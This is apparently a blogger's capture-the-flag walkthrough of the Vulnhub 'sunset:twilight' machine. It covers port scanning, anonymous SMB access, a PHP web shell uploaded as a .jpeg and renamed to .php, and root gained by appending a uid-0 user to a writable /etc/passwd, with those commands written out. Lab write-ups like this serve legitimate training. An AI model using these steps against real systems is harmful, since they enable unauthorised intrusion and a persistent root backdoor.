Vulnhub - sunset:twilight

Introduction

Easy/Intermediate (May variate depending on your background)
It is recommended to run this machine in Virtualbox.
This works better with VirtualBox rather than VMware

Okay let’s see what we can do with this.

VMWare vs VirtualBox

I run Kali in VMWare but I do have VirtualBox too. I downloaded the file as the .7z archive and unzipped it, then imported the applicance into VirtualBox. For networking it defaults to Bridged Mode and that works okay; I check my router for DHCP leases and get the IP - 192.168.1.76.

The banner says it’s Debian GNU/Linux 10 twilight tty1. Running a ping on the IP gives a TTL of 128; not sure what’s up with that.

Nmap

So we’ve got quite a selection of ports:

• 22/tcp open ssh syn-ack ttl 128
• 25/tcp open smtp syn-ack ttl 128
• 80/tcp open http syn-ack ttl 128
• 139/tcp open netbios-ssn syn-ack ttl 128
• 445/tcp open microsoft-ds syn-ack ttl 128
• 2121/tcp open ccproxy-ftp syn-ack ttl 128
• 3306/tcp open mysql syn-ack ttl 128
• 8080/tcp open http-proxy syn-ack ttl 128
• 63525/tcp open unknown syn-ack ttl 128

We’ll probably need some more details on those, so I kick off a detail scan. In the meantime…

2121/FTP

Port 2121 is FTP and anonymous login is allowed but there is nothing interesting in the directory and we can’t move around, so that’s not very useful.

SMB

SMB anonymous login is allowed, so we can poke around the server:

root@kali:/opt/vulnhub/twilight# smbclient -L \\192.168.1.76
Enter WORKGROUP\roots password: 

	Sharename       Type      Comment
	---------       ----      -------
	WRKSHARE        Disk      Workplace Share. Do not access if not an employee.
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

We should check out that WRKSHARE folder.

root@kali:/opt/vulnhub/twilight# smbclient \\\\192.168.1.76\\WRKSHARE

This is actually the server root (assuming we’re not in a container), so that’s nice. I get /etc/passwd and can see we have a user called miguel in /home, but we can’t read his directory. Checking /var/www/html we can poke around the files that make up the website on port 80, and there is an upload function in http://192.168.1.76/gallery/ - maybe we can use this for a shell?

Shell

Sure enough we can upload a PHP shell as shell.jpeg through the web interface on port 80, then rename it via the SMB connection to shell.php. From there we can access it via http://192.168.1.76/gallery/original/shell.php and get a reverse shell back to our attack machine.

Privesc

As usual I ran linpeas, and it highlighted that /etc/passwd was writeable, along with some other interesting things. I’m guessing there are a few paths to root on this box. Anyway, with a writeable passwd file, we can add a new user with a new password using this technique from stackexchange.

# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE

# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd

# to switch to a root2
su root2
Password: mrcake 

Let’s try it out, and we’ll even use his ‘mrcake’ password suggestion:

  
www-data@twilight:/dev/shm$ openssl passwd mrcake
hKLD3431415ZEopenssl passwd mrcake
eAZbSNI9j8A7A
www-data@twilight:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
<Y0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
www-data@twilight:/dev/shm$ su root2
su root2
Password: mrcake

root@twilight:/dev/shm# 

Boom. There is a flag in /root/root.txt, but there’s nowhere to submit it so it doesn’t really matter.

 
cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Footnote

I haven’t been writing much lately, been stuck on some intermediate stuff on TryHackMe and not moving forward much. I did complete the ‘Git Happens’ room though, which was a very straightforward enumeration of a git repo to find some credentials. I also completed OpenKeyS on HackTheBox but I’m not allowed to write that up just yet. I’ve never bothered writing up a HTB machine yet, since I’ve moved on by the time they become inactive. Maybe one day.